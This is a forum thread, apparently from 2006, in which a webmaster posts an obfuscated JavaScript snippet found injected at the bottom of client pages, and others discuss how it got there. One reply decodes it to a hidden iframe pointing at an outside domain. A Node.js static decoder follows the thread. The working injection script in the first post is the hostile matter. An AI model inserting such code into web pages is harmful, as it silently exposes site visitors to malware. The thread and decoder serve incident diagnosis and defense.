  1. #1
    Member
    Join Date
    Aug 2004
    Posts
    28

    How did this javascript get in...

    On the 17th of this month a couple of clients reported a dialler had started popping up on their sites. A closer look revealed the following javascript had been added and hidden at the bottom of the page.

    <script language="JavaScript">
    e = '0x00' + '22';str1 = "%99%C1%CA%D7%BD%D0%D1%DA%C9%C6%9E%83%D7%CA%D0%CA%C3%CA%C9%CA%D1%DA%9B%C5%CA%C1%C1%C6%CF%83%9F%99%CA%C7%D3%C2%CE%C6%BD%D0%D3%C0%9E%83%C5%D1%D1%CD%9B%8C%8C%C1%CF%D7%8E%C0%CC%D6%CF%D1%C6%D3%8F%C0%CC%CE%8C%D1%D3%C7%8C%83%BD%D4%CA%C1%D1%C5%9E%92%BD%C5%C6%CA%C4%C5%D1%9E%92%9F%99%8C%CA%C7%D3%C2%CE%C6%9F%99%8C%C1%CA%D7%9F%BD%AE%AB";str=tmp='';for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCharCode((tmp.charCodeAt(0)^e)-127);}document.write(str);
    </script>

    Now my question is how have they managed to get this javascript onto the page? I'm presuming there's either been a server or security issue somewhere, however one of the affected sites uses no scripting outside of password protected cms. Any thoughts would be greatly appreciated.

  2. #2
    chirpy, Super Moderator
    Join Date
    Jun 2002
    Location
    Go on, have a guess
    Posts
    13,495


    Make sure that you're not suffering from this:
    http://forums.cpanel.net/showthread.php?t=51214
    Jonathan Michaelson

    Need your cPanel servers secured and tuned?
    cPanel Server Configuration, Security, Recovery and Antivirus/AntiSpam Services
    Developers of the most effective (and free) Firewall & Security Solution for cPanel Servers - csf
    http://www.configserver.com

  3. #3
    Member
    Join Date
    Aug 2004
    Posts
    28


    Hmm, the problem is that the server in question is not one I have root access to, indeed it's a 3rd party host who are refusing to accept responsibility. They keep suggesting it's a security hole in one of the scripts running on the site, which I mean is quite possible I guess, however the same scripts are running on over 14 other sites on different servers and hosts without problem. The server is cPanel based so I'm going to try disabling enable_dl via htaccess in the root and see if that solves it.

  4. #4
    Member
    Join Date
    Jun 2003
    Posts
    280


    We've seen this as well recently - IIRC the user in question hadn't updated their antivirus in over 3 months and had recently made changes to the "infected pages", which indicates a virus is changing HTML pages on their hard drives and when they update their site... Boom!

  5. #5
    cPanel Partner NOC
    Join Date
    Jul 2005
    Posts
    1


    After I figured out how to decode the javascript there (replace document.write with alert), it turns out to be some html for a hidden iframe going to dnv-counter.com/trf, and while the site isn't up now, I don't recommend anyone try to visit it. Google hasn't turned up many results, and it seems like anti-virus programs aren't detecting the virus:

    http://www.castlecops.com/postx160127-0-0.html
    http://forums.pcapex.com/windows_os_...00247_exe.html

    I'm not sure if the second one is the same sort of infection (they were less subtle about making those iframes before), but it seems like the same basic principle. My best guess at the moment is that they're either inserting the javascript into the pages as they're being uploaded, or catching the FTP usernames and passwords, sending them back to the central server, and then uploading modified files themselves.

    Could someone who's had their html files infected run task manager and see if you have any weird processes like c:\23423523.exe running, like in the pcapex thread?
    Last edited by reliableDerrick; 07-23-2006 at 07:21 PM.
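
The decoding described in post #5 can also be done statically, without loading the script in a browser at all. The following Node.js sketch is an added example, not code from any poster in this thread: it reverses the snippet's per-byte transform on the string from post #1, treats the result as data only, and reports any iframe source in defanged form. The function names `decodePayload`, `findIframeSources` and `defang` are hypothetical.

```javascript
// Added example: static decoder for the obfuscated snippet quoted in post #1.
// Nothing is eval'd or written into a DOM; the payload is handled as plain data.

// Encoded string copied from the script in post #1.
const STR1 = "%99%C1%CA%D7%BD%D0%D1%DA%C9%C6%9E%83%D7%CA%D0%CA%C3%CA%C9%CA%D1%DA%9B%C5%CA%C1%C1%C6%CF%83%9F%99%CA%C7%D3%C2%CE%C6%BD%D0%D3%C0%9E%83%C5%D1%D1%CD%9B%8C%8C%C1%CF%D7%8E%C0%CC%D6%CF%D1%C6%D3%8F%C0%CC%CE%8C%D1%D3%C7%8C%83%BD%D4%CA%C1%D1%C5%9E%92%BD%C5%C6%CA%C4%C5%D1%9E%92%9F%99%8C%CA%C7%D3%C2%CE%C6%9F%99%8C%C1%CA%D7%9F%BD%AE%AB";

// The snippet builds its key as '0x00' + '22'; the XOR coerces that string to 0x22.
const KEY = Number('0x00' + '22');

// Reverse the snippet's transform for each %XX escape: (byte ^ key) - 127.
function decodePayload(encoded, key) {
  if (!/^(%[0-9A-Fa-f]{2})+$/.test(encoded)) {
    throw new Error('payload is not a pure run of %XX escapes');
  }
  let out = '';
  for (let i = 0; i < encoded.length; i += 3) {
    const byte = parseInt(encoded.slice(i + 1, i + 3), 16);
    out += String.fromCharCode((byte ^ key) - 127);
  }
  return out;
}

// Collect iframe src values from decoded markup (regex heuristic, not an HTML parser).
function findIframeSources(html) {
  const sources = [];
  const re = /<iframe\b[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)/gi;
  let m;
  while ((m = re.exec(html)) !== null) sources.push(m[1]);
  return sources;
}

// Defang a URL so it can be pasted into a ticket without becoming a live link.
function defang(url) {
  return url.replace(/^http/i, 'hxxp').replace(/\./g, '[.]');
}

const decoded = decodePayload(STR1, KEY);
const report = {
  hiddenWrapper: /visibility\s*:\s*hidden/i.test(decoded),
  iframes: findIframeSources(decoded).map(defang),
};
console.log(report);
```

The same `report` check can be run over every HTML file in a site backup to list which pages carry the injected block.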
